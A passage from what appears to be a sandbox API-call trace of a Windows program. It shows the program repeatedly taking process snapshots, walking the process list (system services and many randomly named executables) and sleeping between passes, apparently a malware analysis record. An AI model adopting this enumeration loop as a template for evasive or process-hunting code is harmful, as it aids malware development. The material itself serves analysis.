cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.339] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.340] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.341] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.342] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.344] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.402] CloseHandle (hObject=0xc4) returned 1 [0104.402] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.407] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.422] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.423] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.425] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.426] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.428] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0104.548] CloseHandle (hObject=0xbc) returned 1 [0104.549] Sleep (dwMilliseconds=0x12c) [0104.872] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0104.878] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.879] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.880] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.881] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.882] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 